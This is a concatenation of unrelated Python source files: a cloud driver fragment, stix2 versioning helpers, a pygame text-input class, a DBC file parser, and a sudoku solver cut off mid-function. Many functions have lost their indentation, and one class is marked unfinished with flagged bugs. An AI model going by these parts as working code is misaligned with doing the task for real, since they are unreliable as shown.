return self._to_volume(response.object)
def destroy_volume(self, volume):
action = API_ROOT + '/volume/' + volume.id
self.connection.request(action, method='DELETE')
return True
def list_volumes(self, location=None):
"""
Return a list of volumes.
:keyword location: Location use for filter
:type location: :class:`NodeLocation` or ``None``
:return: A list of volume objects.
:rtype: ``list`` of :class:`StorageVolume`
"""
action = API_ROOT + '/volume'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_volumes(response.object)
def ex_get_volume(self, volume_id):
"""
Return a Volume object based on a volume ID.
:param volume_id: The ID of the volume
:type volume_id: ``int``
:return: A StorageVolume object for the volume
:rtype: :class:`StorageVolume`
"""
action = API_ROOT + '/volume/' + volume_id
response = self.connection.request(action)
return self._to_volume(response.object)
def attach_volume(self, node, volume, device=None):
"""
Attach a volume to a node.
:param node: Node where to attach volume
:type node: :class:`Node`
:param volume: The ID of the volume
:type volume: :class:`StorageVolume`
:param device: Unsed parameter
:return: True or False representing operation successful
:rtype: ``bool``
"""
action = '%s/volume/%s/attach' % (API_ROOT, volume.id)
data = {'instanceId': node.id}
self.connection.request(action, data=data, method='POST')
return True
def detach_volume(self, volume, ex_node=None):
"""
Detach a volume to a node.
:param volume: The ID of the volume
:type volume: :class:`StorageVolume`
:param ex_node: Node to detach from (optionnal if volume is attached
to only one node)
:type ex_node: :class:`Node`
:return: True or False representing operation successful
:rtype: ``bool``
:raises: Exception: If ``ex_node`` is not provided and more than one
node is attached to the volume
"""
action = '%s/volume/%s/detach' % (API_ROOT, volume.id)
if ex_node is None:
if len(volume.extra['attachedTo']) != 1:
err_msg = "Volume '%s' has more or less than one attached \
nodes, you must specify one."
raise Exception(err_msg)
ex_node = self.ex_get_node(volume.extra['attachedTo'][0])
data = {'instanceId': ex_node.id}
self.connection.request(action, data=data, method='POST')
return True
    def _to_volume(self, obj):
        """Convert a raw API volume dict into a StorageVolume."""
        # Copy so fields promoted to first-class attributes can be dropped
        # from ``extra`` without touching the original mapping.
        extra = obj.copy()
        extra.pop('id')
        extra.pop('name')
        extra.pop('size')
        # NOTE(review): this pops 'status' from the *caller's* dict (side
        # effect on ``obj``) while 'status' remains present in ``extra``
        # (copied above) — confirm this asymmetry is intended.
        state = self.VOLUME_STATE_MAP.get(obj.pop('status', None),
                                          StorageVolumeState.UNKNOWN)
        return StorageVolume(id=obj['id'], name=obj['name'], size=obj['size'],
                             state=state, extra=extra, driver=self)
def _to_volumes(self, objs):
return [self._to_volume(obj) for obj in objs]
def _to_location(self, obj):
location = self.connection.LOCATIONS[obj]
return NodeLocation(driver=self, **location)
def _to_locations(self, objs):
return [self._to_location(obj) for obj in objs]
    def _to_node(self, obj):
        """Convert a raw API instance dict into a Node."""
        extra = obj.copy()
        # Two API payload shapes: objects carrying a 'flavorId' expose the
        # address under 'ip'; others under 'ipv4'.
        if 'flavorId' in extra:
            # NOTE(review): pops 'ip' from the caller's dict (``obj``) while
            # the other branch pops 'ipv4' from the local copy (``extra``) —
            # so 'ip' stays in extra but 'ipv4' does not. Confirm intended.
            public_ips = [obj.pop('ip')]
        else:
            ip = extra.pop('ipv4')
            # 'ipv4' may be empty/None for instances without an address yet.
            public_ips = [ip] if ip else []
        del extra['instanceId']
        del extra['name']
        return Node(id=obj['instanceId'], name=obj['name'],
                    state=self.NODE_STATE_MAP[obj['status']],
                    public_ips=public_ips, private_ips=[], driver=self,
                    extra=extra)
def _to_nodes(self, objs):
return [self._to_node(obj) for obj in objs]
def _to_size(self, obj):
extra = {'vcpus': obj['vcpus'], 'type': obj['type'],
'region': obj['region']}
return NodeSize(id=obj['id'], name=obj['name'], ram=obj['ram'],
disk=obj['disk'], bandwidth=None, price=None,
driver=self, extra=extra)
def _to_sizes(self, objs):
return [self._to_size(obj) for obj in objs]
def _to_image(self, obj):
extra = {'region': obj['region'], 'visibility': obj['visibility'],
'deprecated': obj['deprecated']}
return NodeImage(id=obj['id'], name=obj['name'], driver=self,
extra=extra)
def _to_images(self, objs):
return [self._to_image(obj) for obj in objs]
def _to_key_pair(self, obj):
extra = {'region': obj['region']}
return OpenStackKeyPair(name=obj['name'], public_key=obj['publicKey'],
driver=self, fingerprint=obj['fingerPrint'],
extra=extra)
def _to_key_pairs(self, objs):
return [self._to_key_pair(obj) for obj in objs]
def _ex_connection_class_kwargs(self):
return {'ex_consumer_key': self.consumer_key}
    def _add_required_headers(self, headers, method, action, data, timestamp):
        """Sign the request and add the OVH auth headers to ``headers`` in place."""
        # NOTE(review): the ``timestamp`` argument is immediately shadowed by
        # a fresh connection timestamp — confirm the parameter is
        # intentionally ignored.
        timestamp = self.connection.get_timestamp()
        signature = self.connection.make_signature(method, action, data,
                                                   str(timestamp))
        headers.update({
            'X-Ra-Timestamp': timestamp,
            'X-Ra-Signature': signature
        })
|
|
"""STIX2 core versioning methods."""
from collections.abc import Mapping
import copy
import datetime as dt
import itertools
import uuid
import stix2.base
import stix2.registry
from stix2.utils import (
detect_spec_version, get_timestamp, is_sco, parse_into_datetime,
)
import stix2.v20
from .exceptions import (
InvalidValueError, ObjectNotVersionableError, RevokeError,
TypeNotVersionableError, UnmodifiablePropertyError,
)
# STIX object properties that cannot be modified
STIX_UNMOD_PROPERTIES = ['created', 'created_by_ref', 'id', 'type']
# Properties an object type must support for it to be considered versionable
_VERSIONING_PROPERTIES = {"created", "modified", "revoked"}
def _fudge_modified(old_modified, new_modified, use_stix21):
"""
Ensures a new modified timestamp is newer than the old. When they are
too close together, new_modified must be pushed further ahead to ensure
it is distinct and later, after JSON serialization (which may mean it's
actually being pushed a little ways into the future). JSON serialization
can remove precision, which can cause distinct timestamps to accidentally
become equal, if we're not careful.
:param old_modified: A previous "modified" timestamp, as a datetime object
:param new_modified: A candidate new "modified" timestamp, as a datetime
object
:param use_stix21: Whether to use STIX 2.1+ versioning timestamp precision
rules (boolean). This is important so that we are aware of how
timestamp precision will be truncated, so we know how close together
the timestamps can be, and how far ahead to potentially push the new
one.
:return: A suitable new "modified" timestamp. This may be different from
what was passed in, if it had to be pushed ahead.
"""
if use_stix21:
# 2.1+: we can use full precision
if new_modified <= old_modified:
new_modified = old_modified + dt.timedelta(microseconds=1)
else:
# 2.0: we must use millisecond precision
one_ms = dt.timedelta(milliseconds=1)
if new_modified - old_modified < one_ms:
new_modified = old_modified + one_ms
return new_modified
def _get_stix_version(data):
"""
Bit of factored out functionality for getting/detecting the STIX version
of the given value.
:param data: An object, e.g. _STIXBase instance or dict
:return: The STIX version as a string in "X.Y" notation, or None if the
version could not be determined.
"""
stix_version = None
if isinstance(data, Mapping):
# First, determine spec version. It's easy for our stix2 objects; more
# work for dicts.
if isinstance(data, stix2.v20._STIXBase20):
stix_version = "2.0"
elif isinstance(data, stix2.v21._STIXBase21):
stix_version = "2.1"
elif isinstance(data, dict):
stix_version = detect_spec_version(data)
return stix_version
def _is_versionable_type(data):
"""
Determine whether type of the given object is versionable. This check is
done on the basis of support for three properties for the object type:
"created", "modified", and "revoked". If all three are supported, the
object type is versionable; otherwise it is not. Dicts must have a "type"
property. This is used in STIX version detection and to determine a
complete set of supported properties for the type.
If a dict is passed whose "type" is unregistered, then this library has no
knowledge of the type. It can't determine what properties are "supported".
This function will be lax and treat the type as versionable.
Note that this support check is not sufficient for creating a new object
version. Support for the versioning properties does not mean that
sufficient properties are actually present on the object.
Also, detect whether it represents a STIX 2.1 or greater spec version.
:param data: The object to check. Must be either a stix object, or a dict
with a "type" property.
:return: A 2-tuple: the first element is True if the object is versionable
and False if not; the second is the STIX version as a string in "X.Y"
notation.
"""
is_versionable = False
stix_version = None
if isinstance(data, Mapping):
# First, determine spec version
stix_version = _get_stix_version(data)
# Then, determine versionability.
if isinstance(data, stix2.base._STIXBase):
is_versionable = _VERSIONING_PROPERTIES.issubset(
data._properties,
)
elif isinstance(data, dict):
# Tougher to handle dicts. We need to consider STIX version,
# map to a registered class, and from that get a more complete
# picture of its properties.
cls = stix2.registry.class_for_type(data.get("type"), stix_version)
if cls:
is_versionable = _VERSIONING_PROPERTIES.issubset(
cls._properties,
)
else:
# The type is not registered, so we have no knowledge of
# what properties are supported. Let's be lax and let them
# version it.
is_versionable = True
return is_versionable, stix_version
def _check_versionable_object(data):
    """
    Determine whether there are (or may be) sufficient properties present on
    an object to allow versioning; raise if the object can't be versioned.

    Also detects the STIX spec version.

    :param data: The object to check, e.g. dict with a "type" property, or
        _STIXBase instance
    :return: The detected STIX version (string), or None if undeterminable
    :raises TypeNotVersionableError: If the object didn't have the versioning
        properties and the type was found to not support them
    :raises ObjectNotVersionableError: If the type was found to support
        versioning but there were insufficient properties on the object
    """
    if not isinstance(data, Mapping):
        raise TypeNotVersionableError(data)

    if data.keys() >= _VERSIONING_PROPERTIES:
        # All versioning properties already exist on the object: assume they
        # are supported (or custom) and allow versioning.
        return _get_stix_version(data)

    is_versionable_type, stix_version = _is_versionable_type(data)
    if not is_versionable_type:
        raise TypeNotVersionableError(data)

    # The type supports versioning (or is unknown and assumed to). Now the
    # object itself must carry at least "created" as a starting point for
    # new version timestamps.
    if "created" not in data:
        raise ObjectNotVersionableError(data)
    return stix_version
def new_version(data, allow_custom=None, **kwargs):
    """
    Create a new version of a STIX object, by modifying properties and
    updating the ``modified`` property.

    :param data: The object to create a new version of. Maybe a stix2 object
        or dict.
    :param allow_custom: Whether to allow custom properties on the new object.
        If True, allow them (regardless of whether the original had custom
        properties); if False disallow them; if None, auto-detect from the
        object: if it has custom properties, allow them in the new version,
        otherwise don't allow them.
    :param kwargs: The properties to change. Setting to None requests property
        removal.
    :return: The new object.
    :raises RevokeError: If the object is already revoked.
    :raises UnmodifiablePropertyError: If kwargs tries to change an
        unmodifiable (or SCO id-contributing) property.
    :raises InvalidValueError: If an explicit new "modified" timestamp is not
        strictly later than the current one.
    """
    stix_version = _check_versionable_object(data)

    if data.get('revoked'):
        raise RevokeError("new_version")

    try:
        new_obj_inner = copy.deepcopy(data._inner)
    except AttributeError:
        # Plain mapping, not a _STIXBase instance
        new_obj_inner = copy.deepcopy(data)

    # Make sure certain properties aren't trying to change
    # ID contributing properties of 2.1+ SCOs may also not change if a UUIDv5
    # is in use (depending on whether they were used to create it... but they
    # probably were). That would imply an ID change, which is not allowed
    # across versions.
    sco_locked_props = []
    if is_sco(data, "2.1"):
        uuid_ = uuid.UUID(data["id"][-36:])
        if uuid_.variant == uuid.RFC_4122 and uuid_.version == 5:
            if isinstance(data, stix2.base._Observable):
                cls = data.__class__
            else:
                cls = stix2.registry.class_for_type(
                    data["type"], stix_version, "observables",
                )
            sco_locked_props = cls._id_contributing_properties

    unchangable_properties = set()
    for prop in itertools.chain(STIX_UNMOD_PROPERTIES, sco_locked_props):
        if prop in kwargs:
            unchangable_properties.add(prop)
    if unchangable_properties:
        raise UnmodifiablePropertyError(unchangable_properties)

    # Different versioning precision rules in STIX 2.0 vs 2.1, so we need
    # to know which rules to apply.
    precision_constraint = "min" if stix_version == "2.1" else "exact"

    old_modified = data.get("modified") or data.get("created")
    old_modified = parse_into_datetime(
        old_modified, precision="millisecond",
        precision_constraint=precision_constraint,
    )

    cls = type(data)
    if 'modified' in kwargs:
        new_modified = parse_into_datetime(
            kwargs['modified'], precision='millisecond',
            precision_constraint=precision_constraint,
        )
        if new_modified <= old_modified:
            # Bug fix: the previous message concatenated two sentences with
            # no separating space and read "before than or equal to".
            raise InvalidValueError(
                cls, 'modified',
                "The new modified datetime cannot be earlier than or equal "
                "to the current modified datetime. It cannot be equal, as "
                "according to STIX 2 specification, objects that are "
                "different but have the same id and modified timestamp do "
                "not have defined consumer behavior.",
            )
    else:
        # No explicit timestamp: use "now", nudged ahead if necessary so it
        # stays strictly later than the old one after serialization.
        new_modified = get_timestamp()
        new_modified = _fudge_modified(
            old_modified, new_modified, stix_version != "2.0",
        )
    kwargs['modified'] = new_modified

    new_obj_inner.update(kwargs)

    # Set allow_custom appropriately if versioning an object. We will ignore
    # it for dicts.
    if isinstance(data, stix2.base._STIXBase):
        if allow_custom is None:
            new_obj_inner["allow_custom"] = data.has_custom
        else:
            new_obj_inner["allow_custom"] = allow_custom

    # Exclude properties with a value of 'None' in case data is not an
    # instance of a _STIXBase subclass
    return cls(**{k: v for k, v in new_obj_inner.items() if v is not None})
def revoke(data):
    """Revoke a STIX object.

    Returns:
        A new version of the object with ``revoked`` set to ``True``.
    """
    if isinstance(data, Mapping):
        if data.get('revoked'):
            # Already revoked: revoking twice is an error.
            raise RevokeError("revoke")
        return new_version(data, revoked=True)
    raise ValueError(
        "cannot revoke object of this type! Try a dictionary "
        "or instance of an SDO or SRO class.",
    )
def remove_custom_stix(stix_obj):
    """Remove any custom STIX objects or properties.

    Warnings:
        This function is a best effort utility: it removes custom objects and
        properties purely by naming convention — object types prefixed with
        "x-" and property names prefixed with "x\\_". Those conventions are
        SHOULDs, not MUSTs, in the STIX2 spec, so valid custom content that
        ignores them will not be detected by this function.

    Args:
        stix_obj (dict OR python-stix obj): a single python-stix object
            or dict of a STIX object

    Returns:
        A new version of the object with any custom content removed, or
        ``None`` if the entire object is custom.
    """
    if stix_obj['type'].startswith('x-'):
        # if entire object is custom, discard
        return None

    # Map each custom property to None so new_version() removes it.
    custom_props = {}
    for prop in stix_obj:
        if prop.startswith("x_"):
            custom_props[prop] = None

    if not custom_props:
        # Nothing custom: hand back the object unchanged.
        return stix_obj
    return new_version(stix_obj, allow_custom=False, **custom_props)
|
|
# keyboardString.py
# Used to get a string of text entered by the user
import pygame, sys
from pygame.locals import *
from Tkinter import Tk
class keyboardString(object):
    """An editable text buffer with a caret and a selection range.

    ``start``/``end`` delimit the current selection within ``string``
    (``start == end`` means no selection, just a caret), and ``cursor``
    tracks the "active" end of the selection during shift-navigation.
    """
    def __init__(self, string):
        # Initial text; caret at position 0, nothing selected.
        self.string = string
        self.start = 0
        self.end = 0
        self.cursor = 0

    def addKeyPress(self, keyCode): # THIS METHOD NOT DONE YET
        """Apply a single pygame key press to the buffer.

        Handles printable characters (via the module-level ``kn``/``ks``
        keymaps), backspace/delete, arrow/home/end navigation with optional
        shift-selection, and Ctrl-C/V/X/A clipboard shortcuts (clipboard
        access goes through a throwaway Tk root window).
        """
        keyMods = pygame.key.get_mods()
        if keyMods & KMOD_CTRL == 0:
            # Printable input: choose the shifted or unshifted keymap.
            k = ""
            if (keyMods & KMOD_SHIFT != 0):
                if keyCode in ks.keys():
                    k = ks[keyCode]
                elif keyCode in kn.keys():
                    # Shift held but no shifted variant (e.g. Tab/Enter).
                    k = kn[keyCode]
            else:
                if keyCode in kn.keys():
                    k = kn[keyCode]
            if len(k) > 0:
                # Replace the current selection (if any) with the typed char
                # and collapse the selection after it.
                self.string = self.string[0:self.start] + k + self.string[self.end:]
                self.start += 1
                self.cursor = self.end = self.start
                return
        if keyCode == K_BACKSPACE:
            if self.start == self.end:
                # No selection: delete the char before the caret.
                if self.start != 0:
                    self.string = self.string[0:self.start - 1] + self.string[self.end:]
                    self.start -= 1
                    if self.start < 0:
                        self.start = 0
                    self.cursor = self.end = self.start
            else:
                # Selection active: delete it.
                self.string = self.string[0:self.start] + self.string[self.end:]
                self.cursor = self.end = self.start
        elif keyCode == K_DELETE:
            if self.start == self.end:
                # No selection: delete the char after the caret.
                self.string = self.string[0:self.start] + self.string[self.end + 1:]
            else:
                # Selection active: delete it.
                self.string = self.string[0:self.start] + self.string[self.end:]
            self.cursor = self.end = self.start
        elif keyCode == K_RIGHT:
            if keyMods & KMOD_SHIFT != 0:
                if self.start == self.end:
                    # Begin a selection extending right from the caret.
                    self.end += 1
                    if self.end > len(self.string):
                        self.end = len(self.string)
                    self.cursor = self.end
                else:
                    if self.cursor == self.start:
                        # Cursor at the left edge: shrink selection from the left.
                        self.start += 1
                        self.cursor = self.start
                    else:
                        # Cursor at the right edge: grow selection to the right.
                        self.end += 1
                        if self.end > len(self.string):
                            self.end = len(self.string)
                        self.cursor = self.end
            else:
                if self.start == self.end:
                    # Plain right: advance the caret.
                    self.start += 1
                    if self.start > len(self.string):
                        self.start = len(self.string)
                    self.cursor = self.end = self.start
                else:
                    # Collapse the selection to its right edge.
                    self.cursor = self.start = self.end
        elif keyCode == K_LEFT:
            if keyMods & KMOD_SHIFT != 0:
                if self.start == self.end:
                    # Begin a selection extending left from the caret.
                    self.start -= 1
                    if (self.start < 0):
                        self.start = 0
                    self.cursor = self.start
                else:
                    if self.cursor == self.start:
                        # Cursor at the left edge: grow selection to the left.
                        self.start -= 1
                        if (self.start < 0):
                            self.start = 0
                        self.cursor = self.start
                    else:
                        # NOTE(review): with the cursor at the right edge this
                        # increments ``start`` (shrinking from the left) and
                        # leaves the cursor on ``end`` — shift+left would be
                        # expected to move ``end`` left instead. Method is
                        # marked "NOT DONE YET"; confirm before relying on it.
                        self.start += 1
                        self.cursor = self.end
            else:
                if self.start == self.end:
                    # Plain left: retreat the caret.
                    self.start -= 1
                    if (self.start < 0):
                        self.start = 0
                    self.cursor = self.end = self.start
                else:
                    # Collapse the selection to its left edge.
                    self.cursor = self.end = self.start
        elif keyCode == K_HOME:
            if keyMods & KMOD_SHIFT != 0:
                # Extend selection to the beginning of the string.
                self.start = 0
            else:
                self.cursor = self.end = self.start = 0
        elif keyCode == K_END:
            if keyMods & KMOD_SHIFT != 0:
                # Extend selection to the end of the string.
                self.end = len(self.string)
            else:
                self.cursor = self.start = self.end = len(self.string)
        elif keyCode == K_c and (keyMods & KMOD_CTRL != 0):
            # Copy: push the selection onto the system clipboard via Tk.
            tk = Tk()
            tk.withdraw()
            tk.clipboard_clear()
            tk.clipboard_append(self.string[self.start:self.end])
            tk.destroy()
        elif keyCode == K_v and (keyMods & KMOD_CTRL != 0):
            # Paste: replace the selection with the clipboard contents.
            tk = Tk()
            tk.withdraw()
            clipboard = tk.selection_get(selection = "CLIPBOARD")
            tk.destroy()
            self.string = self.string[:self.start] + clipboard + self.string[self.end:]
            # NOTE(review): ``end`` is not updated here, so when pasting over
            # a non-empty selection ``start`` can exceed ``end`` afterwards —
            # looks like a bug; confirm intended behavior.
            self.cursor = self.start = self.end + len(clipboard)
        elif keyCode == K_x and (keyMods & KMOD_CTRL != 0):
            # Cut: copy the selection to the clipboard, then remove it.
            tk = Tk()
            tk.withdraw()
            tk.clipboard_clear()
            tk.clipboard_append(self.string[self.start:self.end])
            tk.destroy()
            # NOTE(review): unlike delete/backspace, ``cursor``/``end`` are
            # not collapsed to ``start`` after removing the text — confirm.
            self.string = self.string[:self.start] + self.string[self.end:]
        elif keyCode == K_a and (keyMods & KMOD_CTRL != 0):
            # Select all, with the cursor at the end.
            self.start = 0
            self.cursor = self.end = len(self.string)

    def setCursorPosition(self, position):
        """Collapse the selection and place the caret, clamped to [0, len]."""
        if position < 0:
            self.cursor = self.start = self.end = 0
        elif position > len(self.string):
            self.cursor = self.start = self.end = len(self.string)
        else:
            self.cursor = self.start = self.end = position

    def setSelection(self, startDrag, endDrag):
        """Set the selection from a mouse drag; drag endpoints may be in
        either order, and the cursor lands on the drag's release end."""
        if endDrag > startDrag:
            self.start = startDrag
            self.end = endDrag
        else:
            self.start = endDrag
            self.end = startDrag
        # Clamp to the valid range of the string.
        if self.start < 0:
            self.start = 0
        if self.end > len(self.string):
            self.end = len(self.string)
        if endDrag > startDrag:
            self.cursor = self.end
        else:
            self.cursor = self.start
# Keymaps filled in by initKeyStrings():
# kn maps pygame key constants to their unshifted character,
# ks maps them to their shifted character.
kn = dict()
ks = dict()
def initKeyStrings():
    """Populate the module-level keymaps ``kn`` (unshifted) and ``ks``
    (shifted) from pygame key constants."""
    # Bug fix: range() excludes its upper bound, so the original loops never
    # mapped K_z, K_9 or K_KP9; use an inclusive upper bound instead.
    for charValue in range(K_a, K_z + 1):
        kn[charValue] = chr(charValue)
        # Shifted letters are uppercase (ASCII offset of 32).
        ks[charValue] = chr(charValue - 32)
    for charValue in range(K_0, K_9 + 1):
        kn[charValue] = chr(charValue)
    for charValue in range(K_KP0, K_KP9 + 1):
        # Keypad digit constants sit 208 above their ASCII digit.
        kn[charValue] = chr(charValue - 208)
    # Shifted digits (US keyboard layout).
    ks[K_0] = ')'
    ks[K_1] = '!'
    ks[K_2] = '@'
    ks[K_3] = '#'
    ks[K_4] = '$'
    ks[K_5] = '%'
    ks[K_6] = '^'
    ks[K_7] = '&'
    ks[K_8] = '*'
    ks[K_9] = '('
    # Punctuation keys: the unshifted character equals the key constant's
    # ASCII value; the shifted variant is given explicitly.
    kn[K_COMMA] = chr(K_COMMA)
    ks[K_COMMA] = '<'
    kn[K_PERIOD] = chr(K_PERIOD)
    ks[K_PERIOD] = '>'
    kn[K_SLASH] = chr(K_SLASH)
    ks[K_SLASH] = '?'
    kn[K_SEMICOLON] = chr(K_SEMICOLON)
    ks[K_SEMICOLON] = ':'
    kn[K_QUOTE] = chr(K_QUOTE)
    ks[K_QUOTE] = '"'
    kn[K_LEFTBRACKET] = chr(K_LEFTBRACKET)
    ks[K_LEFTBRACKET] = '{'
    kn[K_RIGHTBRACKET] = chr(K_RIGHTBRACKET)
    ks[K_RIGHTBRACKET] = '}'
    kn[K_BACKSLASH] = chr(K_BACKSLASH)
    ks[K_BACKSLASH] = '|'
    kn[K_MINUS] = chr(K_MINUS)
    ks[K_MINUS] = '_'
    kn[K_EQUALS] = chr(K_EQUALS)
    ks[K_EQUALS] = '+'
    kn[K_BACKQUOTE] = chr(K_BACKQUOTE)
    ks[K_BACKQUOTE] = '~'
    # Whitespace and keypad specials.
    kn[K_RETURN] = '\n'
    kn[K_TAB] = '\t'
    kn[K_SPACE] = ' '
    kn[K_KP_PERIOD] = '.'
    kn[K_KP_ENTER] = '\n'
    kn[K_KP_PLUS] = '+'
    kn[K_KP_MINUS] = '-'
    kn[K_KP_MULTIPLY] = '*'
    kn[K_KP_DIVIDE] = '/'
|
|
# -*- coding: utf-8 -*-
from collections import namedtuple
from struct import pack, unpack
from .log import log
from .main import DBFile
from .structures import fields, StructureNotFound, getstructure, LocalizedStringField, LocalizedField
from .utils import getfilename, generate_structure
# Seek "whence" values, duplicated here to avoid importing os.
SEEK_CUR = 1 # os.SEEK_CUR
SEEK_END = 2 # os.SEEK_END
class DBCFile(DBFile):
    """
    A DBC file.
    - Each file has an arbitrary amount of columns always of the same length and
    structure (defined in the header).
    - Each string is a 32-bit pointer to an address inside the stringblock, starting
    from 0 as the stringblock address (defined in the header as well).
    - EOF is 1 NULL byte, followed by the stringblock if there is one.
    - The stringblock is a non-repetitive block of null-terminated strings.
    """
    def _readHeader(self):
        # 20-byte header: 4-char signature followed by four little-endian
        # 32-bit ints (row count, field count, record length, stringblock size).
        self.headerStructure = "<4s4i"
        data = self.file.read(20)
        DBCHeader = namedtuple("DBCHeader", ["signature", "row_count", "field_count", "reclen", "stringblocksize"])
        self.header = DBCHeader(*unpack(self.headerStructure, data))
    def _readAddresses(self):
        # Index each row by its leading id field without parsing full rows.
        rows = 0
        field = self.structure[0]
        row_header_size = field.size
        reclen = self.header.reclen
        while rows < self.header.row_count:
            address = self.file.tell() # Get the address of the full row
            id = self._parse_field(self.file, field)
            self._add_row(id, address, reclen)
            self.file.seek(reclen - row_header_size, SEEK_CUR) # minus length of id
            rows += 1
    def _checkPadding(self, file, field):
        """
        In 4.0.0 DBCs, fields are padded to their own size
        within the file. Example:
        byte, int -> byte, pad, pad, pad, int
        """
        address = file.tell()
        seek = (address % field.size)
        # Advance to the next multiple of field.size (no-op when aligned).
        seek = seek and -(seek - field.size)
        file.seek(seek, SEEK_CUR)
    def setStructure(self, structure):
        # NOTE(review): the ``structure`` parameter is never used; the
        # structure is always looked up (or generated) from the file name
        # and build — confirm this is intended.
        name = getfilename(self.file.name)
        try:
            self.structure = getstructure(name, self.build, parent=self)
        except StructureNotFound:
            self.structure = generate_structure(self)
        # Generate the Localized Fields
        fieldidx = []
        for i, field in enumerate(self.structure):
            if isinstance(field, LocalizedField):
                fieldidx.append((i, field.name))
        if fieldidx:
            from copy import copy
            # NOTE(review): this local ``fields`` shadows the module-level
            # ``fields`` import within this method — confirm intended.
            fields = LocalizedStringField(build=self.build)
            for i, name in reversed(fieldidx):
                # Build a copy of the fields
                # Expand each LocalizedField in place into the per-locale
                # subfields (reversed so earlier indexes stay valid).
                toinsert = [copy(field).rename("%s_%s" % (name, field.name)) for field in fields]
                self.structure[i:i+1] = toinsert
        log.info("Using %s build %i" % (self.structure, self.build))
        self.check_integrity()
    def _parse_field(self, data, field, row=None):
        # Builds 11927/12025 pad each field to its own size (see _checkPadding).
        if self.build in (11927, 12025):
            self._checkPadding(data, field)
        return super(DBCFile, self)._parse_field(data, field, row)
    def _parse_row(self, id):
        # Seek to the previously indexed address and parse the full record.
        address, reclen = self._addresses[id]
        self.file.seek(address)
        data = self.file.read(reclen) # We also read id and reclen columns
        row = self.parse_row(data) # assign to DBRow
        self._values[id] = row
    def _parse_string(self, data):
        """Resolve a 32-bit stringblock pointer to its null-terminated string."""
        address, = unpack("<I", data.read(4))
        if not address:
            # Address 0 conventionally means the empty string.
            return ""
        f = self.file
        # Remember where we were so the caller's read position is restored.
        pos = f.tell()
        # NOTE: Avoid seeking with SEEK_END because of a bug in stormlib 8.04
        # f.seek(-self.header.stringblocksize + address)
        # address of the string within the string block
        size = self.size()
        if address > size:
            # NOTE(review): sanity check compares against the whole file
            # size, not the stringblock size — confirm intended.
            #log.warning("File says there is a string at address %i. File is only %i bytes! Corruption?" % (address, size))
            return ""
        # The stringblock sits at the end of the file.
        stringAddress = (size - self.header.stringblocksize + address)
        f.seek(stringAddress)
        # Read until \0
        chars = []
        while True:
            char = f.read(1)
            if char == "\0":
                break
            if not char:
                # We reached EOF before the string was finished.
                log.warning("Unfinished string, premature EOF. File is corrupt.")
                if not chars:
                    log.warning("No string found at 0x%08x (%i). Corruption?" % (address, address - self.header.stringblocksize))
                    return ""
                break
            else:
                chars.append(char)
        f.seek(pos)
        return "".join(chars)
    def check_integrity(self):
        """Warn (don't fail) when the structure disagrees with the header."""
        reclen = self.header.reclen
        struct_len = self.structure._reclen()
        if struct_len != reclen:
            log.warning("%r does not respect DBC reclen. Expected %i, reading %i. (%+i)" % (self.structure, reclen, struct_len, reclen-struct_len))
        field_count = self.header.field_count
        total_fields = len(self.structure)
        if field_count != total_fields:
            log.warning("%r does not respect DBC field count. Expected %i, got %i instead." % (self.structure, field_count, total_fields))
    def data(self):
        """Serialize all rows back to packed bytes, (re)building the
        stringblock (``self._stringBlock``) as a side effect."""
        ret = []
        self._stringBlock = []
        address_lookup = {}
        # Stringblock addresses start at 1; 0 is reserved for "no string".
        address = 1
        for row in self:
            row = self[row]
            row._save()
            _data = []
            for field, value in zip(self.structure, row):
                if isinstance(field, fields.StringField):
                    if not value:
                        _value = 0
                    elif value in address_lookup: # the string is already in the stringblock
                        _value = address_lookup[value]
                    else:
                        _value = address
                        address_lookup[value] = address
                        self._stringBlock.append(value)
                        # +1 for the null terminator.
                        address += len(value) + 1
                    value = pack("<I", _value)
                else:
                    value = pack("<%s" % (field.char), value)
                _data.append(value)
            ret.append("".join(_data))
        return "".join(ret)
    def headerData(self):
        # Pack the header namedtuple back into its 20-byte on-disk form.
        return pack(self.headerStructure, *self.header)
    def eof(self):
        # Leading NULL byte, then the null-terminated stringblock.
        return "\0" + ("\0".join(self._stringBlock)) + "\0"
class WCFFile(DBCFile):
    """
    Pretty much a DBC file without a header.
    Currently only used with baddons.wcf.
    """
    def preload(self):
        """Index rows by id. With no header there is no row count, so stop
        when the id field can no longer be parsed (EOF)."""
        f = self.file
        f.seek(0)
        rows = 0
        field = self.structure[0]
        # No header reclen available: derive the record length from the
        # structure itself.
        reclen = sum(k.size for k in self.structure)
        row_header_size = field.size
        while True:
            address = f.tell() # Get the address of the full row
            id = self._parse_field(f, field)
            if id is None:
                # End of file reached.
                break
            self._add_row(id, address, reclen)
            f.seek(reclen - row_header_size, SEEK_CUR) # minus length of id
            rows += 1
class InferredDBCFile(DBCFile):
    """
    DBCFile with implicit ordering. These files have no IDField.
    """

    def preload(self):
        """Index rows by their 1-based position, since rows carry no id."""
        stream = self.file
        # Skip past the fixed-size header (len() of the header namedtuple
        # matches the original seek target).
        stream.seek(len(self.header))
        reclen = self.header.reclen
        for row_index in range(self.header.row_count):
            # Record the row's file address keyed by its implicit id.
            self._addresses[row_index + 1] = (stream.tell(), reclen)
            stream.seek(reclen, SEEK_CUR)
class UnknownDBCFile(DBCFile):
    """
    A DBC file with an unknown structure.
    """
    # The structure is inferred, so writing back would be unsafe.
    writable = False
    def load_structure(self, filename=None, build=None):
        # filename/build are accepted for interface compatibility but the
        # structure is always generated from the file contents here.
        self.structure = self._generate_structure()
        log.warn("Using generated structure for file %s, build %i" % (self.filename, self.build))
|
|
import logging
# Global record of board snapshots taken after each definitive assignment
# (used for visualizing the solving process).
assignments = []
def assign_value(values, box, value):
    """
    Please use this function to update your values dictionary!

    Sets *box* to *value* in *values* (mutating it in place). Whenever the
    new value is a single digit — i.e. the box is now solved — a snapshot of
    the whole board is appended to the global ``assignments`` list.
    """
    values[box] = value
    is_solved = len(value) == 1
    if is_solved:
        assignments.append(values.copy())
    return values
def shared_subgroup(values):
    """
    Eliminate values by using the shared subgroup strategy.

    For each digit and each "linear" unit (column, row, diagonal): if every
    box that could still hold the digit lies inside one 3x3 square, the digit
    must appear in that unit within that square, so it can be removed from
    every other box of the square.

    Args:
        values(dict): a dictionary of the form {'box_name': '123456789', ...}
    Returns:
        the values dictionary after applying the shared subgroup rule.
    """
    result = values.copy()
    rows = 'ABCDEFGHI'
    cols = '123456789'
    # Only "linear" units matter here; the squares are checked against them.
    line_units = (
        [cross(rows, c) for c in cols] +
        [cross(r, cols) for r in rows] +
        [[r + c for r, c in zip(rows, cols)],
         [r + c for r, c in zip(rows, cols[::-1])]]
    )
